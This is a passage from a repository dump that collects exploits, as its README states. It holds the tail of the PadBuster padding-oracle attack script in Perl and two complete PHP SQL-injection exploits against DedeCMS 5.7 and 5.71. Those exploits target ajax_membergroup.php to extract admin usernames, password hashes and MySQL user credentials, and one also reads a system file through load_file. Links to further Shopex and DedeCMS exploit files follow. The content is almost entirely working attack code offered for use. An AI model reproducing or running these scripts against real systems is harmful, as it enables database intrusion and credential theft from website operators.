= 0; 424 | 425 | if ($pUrl =~ /$pSample/) { 426 | $testUrl =~ s/$pSample/$pTestBytes/; 427 | $wasSampleFound = 1; 428 | } 429 | 430 | my $testPost = ""; 431 | if ($pPost) { 432 | $testPost = $pPost; 433 | if ($pPost =~ /$pSample/) { 434 | $testPost =~ s/$pSample/$pTestBytes/; 435 | $wasSampleFound = 1; 436 | } 437 | } 438 | 439 | my $testCookies = ""; 440 | if ($pCookie) { 441 | $testCookies = $pCookie; 442 | if ($pCookie =~ /$pSample/) { 443 | $testCookies =~ s/$pSample/$pTestBytes/; 444 | $wasSampleFound = 1; 445 | } 446 | } 447 | 448 | if ($wasSampleFound == 0) { 449 | &myPrint("ERROR: Encrypted sample was not found in the test request",0); 450 | exit(); 451 | } 452 | return ($testUrl, $testPost, $testCookies); 453 | } 454 | 455 | sub processBlock { 456 | my ($sampleBytes) = @_; 457 | my $analysisMode; 458 | # Analysis mode is either 0 (response analysis) or 1 (exploit) 459 | $analysisMode = (!$error && $oracleSignature eq "") ? 0 : 1; 460 | 461 | # The return value of this subroutine is the intermediate text for the block 462 | my $returnValue; 463 | 464 | my $complete = 0; 465 | my $autoRetry = 0; 466 | my $hasHit = 0; 467 | 468 | while ($complete == 0) { 469 | # Reset the return value 470 | $returnValue = ""; 471 | 472 | my $repeat = 0; 473 | 474 | # TestBytes are the fake bytes that are pre-pending to the cipher test for the padding attack 475 | my $testBytes = "\x00" x $blockSize; 476 | 477 | my $falsePositiveDetector = 0; 478 | 479 | # Work on one byte at a time, starting with the last byte and moving backwards 480 | OUTERLOOP: 481 | for (my $byteNum = $blockSize - 1; $byteNum >= 0; $byteNum--) { 482 | INNERLOOP: 483 | for (my $i = 255; $i >= 0; $i--) { 484 | # Fuzz the test byte 485 | substr($testBytes, $byteNum, 1, chr($i)); 486 | 487 | # Combine the test bytes and the sample 488 | my $combinedTestBytes = $testBytes.$sampleBytes; 489 | 490 | if ($prefix) { 491 | $combinedTestBytes = &myDecode($prefix,$encodingFormat).$combinedTestBytes 492 | } 493 | 494 | $combinedTestBytes = &myEncode($combinedTestBytes, $encodingFormat); 495 | chomp($combinedTestBytes); 496 | 497 | if (! $noEncodeOption) { 498 | $combinedTestBytes = &uri_escape($combinedTestBytes); 499 | } 500 | 501 | my ($testUrl, $testPost, $testCookies) = &prepRequest($url, $post, $cookie, $sample, $combinedTestBytes); 502 | 503 | # Ok, now make the request 504 | 505 | my ($status, $content, $location, $contentLength) = &makeRequest($method, $testUrl, $testPost, $testCookies); 506 | 507 | 508 | my $signatureData = "$status\t$contentLength\t$location"; 509 | $signatureData = "$status\t$contentLength\t$location\t$content" if $useBody; 510 | 511 | # If this is the first block and there is no padding error message defined, then cycle through 512 | # all possible requests and let the user decide what the padding error behavior is. 513 | if ($analysisMode == 0) { 514 | &myPrint("INFO: No error string was provided...starting response analysis\n",0) if ($i == 255); 515 | $oracleGuesses{$signatureData}++; 516 | 517 | $responseFileBuffer{$signatureData} = "URL: $testUrl\nPost Data: $testPost\nCookies: $testCookies\n\nStatus: $status\nLocation: $location\nContent-Length: $contentLength\nContent:\n$content"; 518 | 519 | if ($byteNum == $blockSize - 1 && $i == 0) { 520 | &myPrint("*** Response Analysis Complete ***\n",0); 521 | &determineSignature(); 522 | $analysisMode = 1; 523 | $repeat = 1; 524 | last OUTERLOOP; 525 | } 526 | } 527 | 528 | my $continue = "y"; 529 | 530 | if (($error && $content !~ /$error/) || ($oracleSignature ne "" && $oracleSignature ne $signatureData)) { 531 | # This is for autoretry logic (only works on the first byte) 532 | if ($autoRetry == 1 && ($byteNum == ($blockSize - 1) ) && $hasHit == 0 ) { 533 | $hasHit++; 534 | } else { 535 | # If there was no padding error, then it worked 536 | &myPrint("[+] Success: (".abs($i-256)."/256) [Byte ".($byteNum+1)."]",0); 537 | &myPrint("[+] Test Byte:".&uri_escape(substr($testBytes, $byteNum, 1)),1); 538 | 539 | # If continually getting a hit on attempt zero, then something is probably wrong 540 | $falsePositiveDetector++ if ($i == 255); 541 | 542 | if ($interactive == 1) { 543 | $continue = &promptUser("Do you want to use this value (Yes/No/All)? [y/n/a]","",1); 544 | } 545 | 546 | if ($continue eq "y" || $continue eq "a") { 547 | $interactive = 0 if ($continue eq "a"); 548 | 549 | # Next, calculate the decrypted byte by XORing it with the padding value 550 | my ($currentPaddingByte, $nextPaddingByte); 551 | 552 | # These variables could allow for flexible padding schemes (for now PCKS) 553 | # For PCKS#7, the padding block is equal to chr($blockSize - $byteNum) 554 | $currentPaddingByte = chr($blockSize - $byteNum); 555 | $nextPaddingByte = chr($blockSize - $byteNum + 1); 556 | 557 | my $decryptedByte = substr($testBytes, $byteNum, 1) ^ $currentPaddingByte; 558 | &myPrint("[+] XORing with Padding Char, which is ".&uri_escape($currentPaddingByte),1); 559 | 560 | $returnValue = $decryptedByte.$returnValue; 561 | &myPrint("[+] Decrypted Byte is: ".&uri_escape($decryptedByte),1); 562 | 563 | # Finally, update the test bytes in preparation for the next round, based on the padding used 564 | for (my $k = $byteNum; $k < $blockSize; $k++) { 565 | # First, XOR the current test byte with the padding value for this round to recover the decrypted byte 566 | substr($testBytes, $k, 1,(substr($testBytes, $k, 1) ^ $currentPaddingByte)); 567 | 568 | # Then, XOR it again with the padding byte for the next round 569 | substr($testBytes, $k, 1,(substr($testBytes, $k, 1) ^ $nextPaddingByte)); 570 | } 571 | last INNERLOOP; 572 | } 573 | 574 | } 575 | } 576 | 577 | ## TODO: Combine these two blocks? 578 | if ($i == 0 && $analysisMode == 1) { 579 | # End of the road with no success. We should probably try again. 580 | &myPrint("ERROR: No matching response on [Byte ".($byteNum+1)."]",0); 581 | 582 | if ($autoRetry == 0) { 583 | $autoRetry = 1; 584 | &myPrint(" Automatically trying one more time...",0); 585 | $repeat = 1; 586 | last OUTERLOOP; 587 | 588 | } else { 589 | if (($byteNum == $blockSize - 1) && ($error)) { 590 | &myPrint("\nAre you sure you specified the correct error string?",0); 591 | &myPrint("Try re-running without the -e option to perform a response analysis.\n",0); 592 | } 593 | 594 | $continue = &promptUser("Do you want to start this block over? (Yes/No)? [y/n/a]","",1); 595 | if ($continue ne "n") { 596 | &myPrint("INFO: Switching to interactive mode",0); 597 | $interactive = 1; 598 | $repeat = 1; 599 | last OUTERLOOP; 600 | } 601 | } 602 | } 603 | if ($falsePositiveDetector == $blockSize) { 604 | &myPrint("\n*** ERROR: It appears there are false positive results. ***\n",0); 605 | &myPrint("HINT: The most likely cause for this is an incorrect error string.\n",0); 606 | if ($error) { 607 | &myPrint("[+] Check the error string you provided and try again, or consider running",0); 608 | &myPrint("[+] without an error string to perform an automated response analysis.\n",0); 609 | } else { 610 | &myPrint("[+] You may want to consider defining a custom padding error string",0); 611 | &myPrint("[+] instead of the automated response analysis.\n",0); 612 | } 613 | $continue = &promptUser("Do you want to start this block over? (Yes/No)? [y/n/a]","",1); 614 | if ($continue eq "y") { 615 | &myPrint("INFO: Switching to interactive mode",0); 616 | $interactive = 1; 617 | $repeat = 1; 618 | last OUTERLOOP; 619 | } 620 | } 621 | } 622 | } 623 | ($repeat == 1) ? ($complete = 0) : ($complete = 1); 624 | } 625 | return $returnValue; 626 | } 627 | 628 | sub makeRequest { 629 | 630 | my ($method, $url, $data, $cookie) = @_; 631 | my ($noConnect, $lwp, $status, $content, $req, $location, $contentLength); 632 | my $numRetries = 0; 633 | $data ='' unless $data; 634 | $cookie='' unless $cookie; 635 | 636 | $requestTracker++; 637 | do { 638 | #Quick hack to avoid hostname in URL when using a proxy with SSL (this will get re-set later if needed) 639 | $ENV{HTTPS_PROXY} = ""; 640 | 641 | $lwp = LWP::UserAgent->new(env_proxy => 1, 642 | keep_alive => 1, 643 | timeout => 30, 644 | requests_redirectable => [], 645 | ); 646 | 647 | $req = new HTTP::Request $method => $url; 648 | 649 | &myPrint("Request:\n$method\n$url\n$data\n$cookie",0) if $superVerbose; 650 | 651 | # Add request content for POST and PUTS 652 | if ($data) { 653 | $req->content_type('application/x-www-form-urlencoded'); 654 | $req->content($data); 655 | } 656 | 657 | if ($proxy) { 658 | my $proxyUrl = "http://"; 659 | if ($proxyAuth) { 660 | my ($proxyUser, $proxyPass) = split(":",$proxyAuth); 661 | $ENV{HTTPS_PROXY_USERNAME} = $proxyUser; 662 | $ENV{HTTPS_PROXY_PASSWORD} = $proxyPass; 663 | $proxyUrl .= $proxyAuth."@"; 664 | } 665 | $proxyUrl .= $proxy; 666 | $lwp->proxy(['http'], "http://".$proxy); 667 | $ENV{HTTPS_PROXY} = "http://".$proxy; 668 | } 669 | 670 | 671 | if ($auth) { 672 | my ($httpuser, $httppass) = split(/:/,$auth); 673 | $req->authorization_basic($httpuser, $httppass); 674 | } 675 | 676 | # If cookies are defined, add a COOKIE header 677 | if (! $cookie eq "") { 678 | $req->header(Cookie => $cookie); 679 | } 680 | 681 | if ($headers) { 682 | my @customHeaders = split(/;/i,$headers); 683 | for (my $i = 0; $i <= $#customHeaders; $i++) { 684 | my ($headerName, $headerVal) = split(/\::/i,$customHeaders[$i]); 685 | $req->header($headerName, $headerVal); 686 | } 687 | } 688 | 689 | my $startTime = &gettimeofday(); 690 | my $response = $lwp->request($req); 691 | my $endTime = &gettimeofday(); 692 | $timeTracker = $timeTracker + ($endTime - $startTime); 693 | 694 | if ($printStats == 1 && $requestTracker % 250 == 0) { 695 | print "[+] $requestTracker Requests Issued (Avg Request Time: ".(sprintf "%.3f", $timeTracker/100).")\n"; 696 | $timeTracker = 0; 697 | } 698 | 699 | 700 | # Extract the required attributes from the response 701 | $status = substr($response->status_line, 0, 3); 702 | $content = $response->content; 703 | 704 | &myPrint("Response Content:\n$content",0) if $superVerbose; 705 | $location = $response->header("Location"); 706 | if (!$location) { 707 | $location = "N/A"; 708 | } 709 | #$contentLength = $response->header("Content-Length"); 710 | $contentLength = length($content); 711 | 712 | 713 | my $contentEncoding = $response->header("Content-Encoding"); 714 | if ($contentEncoding) { 715 | if ($contentEncoding =~ /GZIP/i ) { 716 | $content = Compress::Zlib::memGunzip($content); 717 | $contentLength = length($content); 718 | } 719 | } 720 | 721 | my $statusMsg = $response->status_line; 722 | #myPrint("Status: $statusMsg, Location: $location, Length: $contentLength",1); 723 | 724 | if ($statusMsg =~ /Can't connect/) { 725 | print "ERROR: $statusMsg\n Retrying in 10 seconds...\n\n"; 726 | $noConnect = 1; 727 | $numRetries++; 728 | sleep 10; 729 | } else { 730 | $noConnect = 0; 731 | $totalRequests++; 732 | } 733 | } until (($noConnect == 0) || ($numRetries >= 15)); 734 | if ($numRetries >= 15) { 735 | &myPrint("ERROR: Number of retries has exceeded 15 attempts...quitting.\n",0); 736 | exit; 737 | } 738 | return ($status, $content, $location, $contentLength); 739 | } 740 | 741 | sub myPrint { 742 | my ($printData, $printLevel) = @_; 743 | $printData .= "\n"; 744 | if (($verbose && $printLevel > 0) || $printLevel < 1 || $superVerbose) { 745 | print $printData; 746 | &writeFile("ActivityLog.txt",$printData); 747 | } 748 | } 749 | 750 | sub myEncode { 751 | my ($toEncode, $format) = @_; 752 | return &encodeDecode($toEncode, 0, $format); 753 | } 754 | 755 | sub myDecode { 756 | my ($toDecode, $format) = @_; 757 | return &encodeDecode($toDecode, 1, $format); 758 | } 759 | 760 | sub encodeDecode { 761 | my ($toEncodeDecode, $oper, $format) = @_; 762 | # Oper: 0=Encode, 1=Decode 763 | # Format: 0=Base64, 1 Hex Lower, 2 Hex Upper, 3=NetUrlToken 764 | my $returnVal = ""; 765 | if ($format == 1 || $format == 2) { 766 | # HEX 767 | if ($oper == 1) { 768 | #Decode 769 | #Always convert to lower when decoding) 770 | $toEncodeDecode = lc($toEncodeDecode); 771 | $returnVal = pack("H*",$toEncodeDecode); 772 | } else { 773 | #Encode 774 | $returnVal = unpack("H*",$toEncodeDecode); 775 | if ($format == 2) { 776 | #Uppercase 777 | $returnVal = uc($returnVal) 778 | } 779 | } 780 | } elsif ($format == 3) { 781 | # NetUrlToken 782 | if ($oper == 1) { 783 | $returnVal = &web64Decode($toEncodeDecode,1); 784 | } else { 785 | $returnVal = &web64Encode($toEncodeDecode,1); 786 | } 787 | } elsif ($format == 4) { 788 | # Web64 789 | if ($oper == 1) { 790 | $returnVal = &web64Decode($toEncodeDecode,0); 791 | } else { 792 | $returnVal = &web64Encode($toEncodeDecode,0); 793 | } 794 | } else { 795 | # B64 796 | if ($oper == 1) { 797 | $returnVal = &decode_base64($toEncodeDecode); 798 | } else { 799 | $returnVal = &encode_base64($toEncodeDecode); 800 | $returnVal =~ s/(\r|\n)//g; 801 | } 802 | } 803 | 804 | return $returnVal; 805 | } 806 | 807 | 808 | sub web64Encode { 809 | my ($input, $net) = @_; 810 | # net: 0=No Padding Number, 1=Padding (NetUrlToken) 811 | $input = &encode_base64($input); 812 | $input =~ s/(\r|\n)//g; 813 | $input =~ s/\+/\-/g; 814 | $input =~ s/\//\_/g; 815 | my $count = $input =~ s/\=//g; 816 | $count = 0 if ($count eq ""); 817 | $input.=$count if ($net == 1); 818 | return $input; 819 | } 820 | 821 | sub web64Decode { 822 | my ($input, $net) = @_; 823 | # net: 0=No Padding Number, 1=Padding (NetUrlToken) 824 | $input =~ s/\-/\+/g; 825 | $input =~ s/\_/\//g; 826 | if ($net == 1) { 827 | my $count = chop($input); 828 | $input = $input.("=" x int($count)); 829 | } 830 | return &decode_base64($input); 831 | } 832 | 833 | 834 | sub promptUser { 835 | my($prompt, $default, $yn) = @_; 836 | my $defaultValue = $default ? "[$default]" : ""; 837 | print "$prompt $defaultValue: "; 838 | chomp(my $input = ); 839 | 840 | $input = $input ? $input : $default; 841 | if ($yn) { 842 | if ($input =~ /^y|n|a$/) { 843 | return $input; 844 | } else { 845 | &promptUser($prompt, $default, $yn); 846 | } 847 | } else { 848 | if ($input =~ /^-?\d/ && $input > 0 && $input < 256) { 849 | return $input; 850 | } else { 851 | &promptUser($prompt, $default); 852 | } 853 | } 854 | } 855 | 856 | sub writeFile { 857 | my ($fileName, $fileContent) = @_; 858 | if ($logFiles) { 859 | if ($dirExists != 1) { 860 | system($dirCmd." ".$dirName); 861 | $dirExists = 1; 862 | } 863 | $fileName = $dirName.$dirSlash.$fileName; 864 | open(my $OUTFILE, '>>', $fileName) or die "ERROR: Can't write to file $fileName\n"; 865 | print $OUTFILE $fileContent; 866 | close($OUTFILE); 867 | } 868 | } 869 | 870 | sub getTime { 871 | my ($format) = @_; 872 | my ($second, $minute, $hour, $day, $month, $year, $weekday, $dayofyear, $isDST) = localtime(time); 873 | my @months = ("JAN","FEB","MAR","APR","MAY","JUN","JUL","AUG","SEP","OCT","NOV","DEC"); 874 | my @days = ("SUN","MON","TUE","WED","THU","FRI","SAT"); 875 | $month=sprintf("%02d",$month); 876 | $day=sprintf("%02d",$day); 877 | $hour=sprintf("%02d",$hour); 878 | $minute=sprintf("%02d",$minute); 879 | $second=sprintf("%02d", $second); 880 | $year =~ s/^.//; 881 | if ($format eq "F") { 882 | return $day.$months[$month].$year."-".( ($hour * 3600) + ($minute * 60) + ($second) ); 883 | } elsif ($format eq "S") { 884 | return $months[$month]." ".$day.", 20".$year." at ".$hour.":".$minute.":".$second; 885 | } else { 886 | return $hour.":".$minute.":".$second; 887 | } 888 | } 889 | 890 | -------------------------------------------------------------------------------- /PadBuster-Padding Oracle Attack/参考.txt: -------------------------------------------------------------------------------- 1 | http://www.secpulse.com/archives/3537.html -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | just for 分享各种exp 2 | 3 | 4 | exp都是从各地收集而来,原来标有作者的信息的并不会被删除,若没有的,作者看到可联系我加上作者信息或者要求删除。 5 | -------------------------------------------------------------------------------- /Shopex/4.8.4.htm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/Shopex/4.8.4.htm -------------------------------------------------------------------------------- /Shopex/4.8.5.htm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/Shopex/4.8.5.htm -------------------------------------------------------------------------------- /Shopex/exploit.htm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/Shopex/exploit.htm -------------------------------------------------------------------------------- /dede/Dede v5.7 feedback.php-12-10-31.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/dede/Dede v5.7 feedback.php-12-10-31.html -------------------------------------------------------------------------------- /dede/buy_action.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/dede/buy_action.php -------------------------------------------------------------------------------- /dede/dede_5.7.php: -------------------------------------------------------------------------------- 1 | ". 16 | "\n[+] Exp : php ".$argv[0]." localhost /". 17 | 18 | "\n\n"); 19 | } 20 | 21 | function query($biao,$chr,$chs) 22 | { 23 | global $pre; 24 | switch ($chs){ 25 | case 1: 26 | $query = "@`\'` Union select concat(0x7e,0x27,count(*),0x27,0x7e) from `".$pre."admin` where 1 or id=@`\'`"; 27 | break; 28 | case 2: 29 | $query = "@`\'` Union select concat(0x7e,0x27,userid,0x7C,pwd,0x27,0x7e) from `".$pre."admin` limit $chr,1 Union select concat(0x7e,0x27,userid,0x7C,pwd,0x27,0x7e) from `".$pre."admin` where 1=2 or id=@`\'`"; 30 | break; 31 | case 3: 32 | $query = "'"; 33 | break; 34 | case 4: 35 | $query = "@`\'` Union select concat(0x7e,0x27,count(*),0x27,0x7e) from `mysql`.user where 1 or user=@`\'`"; 36 | break; 37 | case 5: 38 | $query = "@`\'` Union select concat(0x7e,0x27,Host,0x7C,User,0x7C,Password,0x7C,Select_priv,0x27,0x7e) from `mysql`.user limit $chr,1 Union select 1 from `".$pre."admin` where 1=2 or id=@`\'`"; 39 | break; 40 | case 6: 41 | $query = "@`\'` Union select concat(0x7e,0x27,Load_file(0x633A5C626F6F742E696E69),0x27,0x7e) from `mysql`.user where 1 or user=@`\'`"; 42 | break; 43 | } 44 | //echo $query."\r\n"; 45 | $query = urlencode($query); 46 | return $query; 47 | } 48 | 49 | function exploit($hostname, $path,$biao, $chr, $chs) 50 | { 51 | $conn = fsockopen($hostname, 80); 52 | if (!$conn){ 53 | exit("\r\n[-] No response from $conn\n"); 54 | } 55 | 56 | $postdata = "action=post&membergroup=".query($biao,$chr,$chs); 57 | $message = "POST ".$path."member/ajax_membergroup.php HTTP/1.1\r\n"; 58 | $message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*\r\n"; 59 | $message .= "Accept-Language: zh-cn\r\n"; 60 | $message .= "Content-Type: application/x-www-form-urlencoded\r\n"; 61 | $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; 62 | $message .= "Host: $hostname\r\n"; 63 | $message .= "Content-Length: ".strlen($postdata)."\r\n"; 64 | $message .= "Cookie: $sessions\r\n"; 65 | $message .= "Connection: Close\r\n\r\n"; 66 | $message .= $postdata; 67 | //echo $message ; 68 | $inheader = 1; 69 | fputs($conn, $message); 70 | while (!feof($conn)) 71 | $reply .= fread($conn, 1024); 72 | fclose($conn); 73 | //print $reply; 74 | 75 | 76 | $reply=substr($reply,strpos($reply,"\r\n\r\n")); 77 | //echo $reply; 78 | //echo iconv('UTF-8', 'GB2312', $reply); 79 | return $reply; 80 | } 81 | 82 | 83 | function GetPre($hostname,$path) 84 | { 85 | $tmp = array(); 86 | $exit = 0; 87 | while ($exit==0) 88 | { 89 | $response = exploit($hostname, $path,1,1,3); 90 | //echo $response; 91 | if (preg_match("/FROM (.*?)member_group/i",$response,$tmp)) 92 | { 93 | $exit = 1; 94 | return $tmp[1]; 95 | } 96 | else 97 | return "dede_"; 98 | } 99 | } 100 | 101 | function dbcounts($hostname,$path) 102 | { 103 | $tmp = array(); 104 | $exit = 0; 105 | while ($exit==0) 106 | { 107 | $response = exploit($hostname, $path,1,1,4); 108 | //echo $response; 109 | if (preg_match("/\~\'(.*?)\'\~/i",$response,$tmp)) 110 | { 111 | $exit = 1; 112 | return $tmp[1]; 113 | } 114 | else 115 | return "Can't Get\r\n"; 116 | } 117 | } 118 | 119 | function counts($hostname,$path) 120 | { 121 | $tmp = array(); 122 | $exit = 0; 123 | while ($exit==0) 124 | { 125 | $response = exploit($hostname, $path,1,1,1); 126 | //echo $response; 127 | if (preg_match("/\~\'(.*?)\'\~/i",$response,$tmp)) 128 | { 129 | $exit = 1; 130 | return $tmp[1]; 131 | } 132 | else 133 | return "Can't Get\r\n"; 134 | } 135 | } 136 | 137 | function GetDBUser($hostname,$path,$c) 138 | { 139 | $tmp = array(); 140 | $exit = 0; 141 | while ($exit==0) 142 | { 143 | $response = exploit($hostname, $path,1,$c-1,5); 144 | if (preg_match("/\~\'(.*?)\'\~/i",$response,$tmp)) 145 | { 146 | $exit = 1; 147 | return $tmp[1]; 148 | } 149 | else 150 | return "Can't Get\r\n"; 151 | } 152 | } 153 | 154 | function GetUser($hostname,$path,$c) 155 | { 156 | $tmp = array(); 157 | $exit = 0; 158 | while ($exit==0) 159 | { 160 | $response = exploit($hostname, $path,1,$c-1,2); 161 | if (preg_match("/\~\'(.*?)\'\~/i",$response,$tmp)) 162 | { 163 | $exit = 1; 164 | return $tmp[1]; 165 | } 166 | else 167 | return "Can't Get\r\n"; 168 | } 169 | } 170 | 171 | /////////////////////////////////////////////////////////////////// 172 | /////////////////////////////////////////////////////////////////// 173 | 174 | if ($argc != 3) 175 | usage(); 176 | $hostname = $argv[1]; 177 | $path = $argv[2]; 178 | echo "[+] =======================================================\n"; 179 | echo "[+] Pre: "; 180 | ob_flush(); 181 | flush(); 182 | $pre=GetPre($hostname, $path); 183 | echo $pre."\n"; 184 | echo "[+] DbCount: "; 185 | ob_flush(); 186 | flush(); 187 | $dbcount=dbcounts($hostname, $path); 188 | echo $dbcount."\n"; 189 | /////////////////////////////////////////////////////////////////// 190 | $c=1; 191 | /////////////////////////////////////////////////////////////////// 192 | while($c<=$dbcount){ 193 | echo "[+] <".($c).">\r\n"; 194 | ob_flush(); 195 | flush(); 196 | $dbuser=GetDBUser($hostname,$path,$c); 197 | echo $dbuser."\n"; 198 | $c++; 199 | } 200 | /////////////////////////////////////////////////////////////////// 201 | echo "[+] Admin@Count: "; 202 | ob_flush(); 203 | flush(); 204 | $count=counts($hostname, $path); 205 | echo $count."\n"; 206 | ob_flush(); 207 | flush(); 208 | /////////////////////////////////////////////////////////////////// 209 | $c=1; 210 | /////////////////////////////////////////////////////////////////// 211 | while($c<=$count){ 212 | echo "[+] <".($c).">\r\n"; 213 | ob_flush(); 214 | flush(); 215 | $user=GetUser($hostname,$path,$c); 216 | echo $user."\n"; 217 | $c++; 218 | } 219 | /////////////////////////////////////////////////////////////////// 220 | ?> -------------------------------------------------------------------------------- /dede/dede_5.71.php: -------------------------------------------------------------------------------- 1 | ". 16 | "\n[+] Exp : php ".$argv[0]." localhost /". 17 | 18 | "\n\n"); 19 | } 20 | 21 | function query($biao,$chr,$chs) 22 | { 23 | global $pre; 24 | switch ($chs){ 25 | case 1: 26 | $query = "`a\'` and(SELECT/*\'\'*/1 FROM(select/*\'\'*/count(*),concat(floor(rand(0)*2),(SELECT/*\'\'*/concat(0x5b,count(*),0x5d) from ".$pre."admin))a from information_schema.tables group by a)b)"; 27 | break; 28 | case 2: 29 | $query = "`a\'` and(SELECT/*\'\'*/1 FROM(select/*\'\'*/count(*),concat(floor(rand(0)*2),(SELECT/*\'\'*/concat(0x5b,userid,0x3a,pwd,0x5d) from ".$pre."admin Limit ".$chr.",1))a from information_schema.tables group by a)b)"; 30 | break; 31 | case 3: 32 | $query = "'"; 33 | break; 34 | case 4: 35 | $query = "`a\'` and(SELECT/*\'\'*/1 FROM(select/*\'\'*/count(*),concat(floor(rand(0)*2),(SELECT/*\'\'*/concat(0x5b,count(*),0x5d) from mysql.user))a from information_schema.tables group by a)b)"; 36 | break; 37 | case 5: 38 | $query = "`a\'` and(SELECT/*\'\'*/1 FROM(select/*\'\'*/count(*),concat(floor(rand(0)*2),(SELECT/*\'\'*/concat(0x5b,Host,0x7C,User,0x7C,Password,0x7C,File_priv,0x5d) from mysql.user Limit ".$chr.",1))a from information_schema.tables group by a)b)"; 39 | break; 40 | } 41 | //echo $query."\r\n"; 42 | $query = urlencode($query); 43 | return $query; 44 | } 45 | 46 | function exploit($hostname, $path,$biao, $chr, $chs) 47 | { 48 | $conn = fsockopen($hostname, 80); 49 | if (!$conn){ 50 | exit("\r\n[-] No response from $conn\n"); 51 | } 52 | 53 | $postdata = "action=post&membergroup=".query($biao,$chr,$chs); 54 | $message = "POST ".$path."member/ajax_membergroup.php HTTP/1.1\r\n"; 55 | $message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*\r\n"; 56 | $message .= "Accept-Language: zh-cn\r\n"; 57 | $message .= "Content-Type: application/x-www-form-urlencoded\r\n"; 58 | $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; 59 | $message .= "Host: $hostname\r\n"; 60 | $message .= "Content-Length: ".strlen($postdata)."\r\n"; 61 | $message .= "Cookie: $sessions\r\n"; 62 | $message .= "Connection: Close\r\n\r\n"; 63 | $message .= $postdata; 64 | //echo $message ; 65 | $inheader = 1; 66 | fputs($conn, $message); 67 | while (!feof($conn)) 68 | $reply .= fread($conn, 1024); 69 | fclose($conn); 70 | //print $reply; 71 | 72 | 73 | $reply=substr($reply,strpos($reply,"\r\n\r\n")); 74 | //echo $reply; 75 | //echo iconv('UTF-8', 'GB2312', $reply); 76 | return $reply; 77 | } 78 | 79 | 80 | function GetPre($hostname,$path) 81 | { 82 | $tmp = array(); 83 | $exit = 0; 84 | while ($exit==0) 85 | { 86 | $response = exploit($hostname, $path,1,1,3); 87 | //echo $response; 88 | if (preg_match("/FROM (.*?)member_group/i",$response,$tmp)) 89 | { 90 | $exit = 1; 91 | return $tmp[1]; 92 | } 93 | else 94 | return "dede_"; 95 | } 96 | } 97 | 98 | function dbcounts($hostname,$path) 99 | { 100 | $tmp = array(); 101 | $exit = 0; 102 | while ($exit==0) 103 | { 104 | $response = exploit($hostname, $path,1,1,4); 105 | //echo $response; 106 | if (preg_match("/\[(.*?)\]/i",$response,$tmp)) 107 | { 108 | $exit = 1; 109 | return $tmp[1]; 110 | } 111 | else 112 | return "Can't Get\r\n"; 113 | } 114 | } 115 | 116 | function counts($hostname,$path) 117 | { 118 | $tmp = array(); 119 | $exit = 0; 120 | while ($exit==0) 121 | { 122 | $response = exploit($hostname, $path,1,1,1); 123 | //echo $response; 124 | if (preg_match("/\[(.*?)\]/i",$response,$tmp)) 125 | { 126 | $exit = 1; 127 | return $tmp[1]; 128 | } 129 | else 130 | return "Can't Get\r\n"; 131 | } 132 | } 133 | 134 | function GetDBUser($hostname,$path,$c) 135 | { 136 | $tmp = array(); 137 | $exit = 0; 138 | while ($exit==0) 139 | { 140 | $response = exploit($hostname, $path,1,$c-1,5); 141 | if (preg_match("/\'\d(.*?)\'/i",$response,$tmp)) 142 | { 143 | $exit = 1; 144 | return $tmp[1]; 145 | } 146 | else 147 | return "Can't Get\r\n"; 148 | } 149 | } 150 | 151 | function GetUser($hostname,$path,$c) 152 | { 153 | $tmp = array(); 154 | $exit = 0; 155 | while ($exit==0) 156 | { 157 | $response = exploit($hostname, $path,1,$c-1,2); 158 | if (preg_match("/\'\d(.*?)\'/i",$response,$tmp)) 159 | { 160 | $exit = 1; 161 | return $tmp[1]; 162 | } 163 | else 164 | return "Can't Get\r\n"; 165 | } 166 | } 167 | 168 | /////////////////////////////////////////////////////////////////// 169 | /////////////////////////////////////////////////////////////////// 170 | 171 | if ($argc != 3) 172 | usage(); 173 | $hostname = $argv[1]; 174 | $path = $argv[2]; 175 | echo "[+] =======================================================\n"; 176 | echo "[+] Pre: "; 177 | ob_flush(); 178 | flush(); 179 | $pre=GetPre($hostname, $path); 180 | echo $pre."\n"; 181 | echo "[+] DbCount: "; 182 | ob_flush(); 183 | flush(); 184 | $dbcount=dbcounts($hostname, $path); 185 | echo $dbcount."\n"; 186 | /////////////////////////////////////////////////////////////////// 187 | $c=1; 188 | /////////////////////////////////////////////////////////////////// 189 | while($c<=$dbcount){ 190 | echo "[+] <".($c).">\r\n"; 191 | ob_flush(); 192 | flush(); 193 | $dbuser=GetDBUser($hostname,$path,$c); 194 | echo $dbuser."\n"; 195 | $c++; 196 | } 197 | /////////////////////////////////////////////////////////////////// 198 | echo "[+] Admin@Count: "; 199 | ob_flush(); 200 | flush(); 201 | $count=counts($hostname, $path); 202 | echo $count."\n"; 203 | ob_flush(); 204 | flush(); 205 | /////////////////////////////////////////////////////////////////// 206 | $c=1; 207 | /////////////////////////////////////////////////////////////////// 208 | while($c<=$count){ 209 | echo "[+] <".($c).">\r\n"; 210 | ob_flush(); 211 | flush(); 212 | $user=GetUser($hostname,$path,$c); 213 | echo $user."\n"; 214 | $c++; 215 | } 216 | /////////////////////////////////////////////////////////////////// 217 | ?> -------------------------------------------------------------------------------- /dede/dedecms v55漏洞利用.htm: -------------------------------------------------------------------------------- 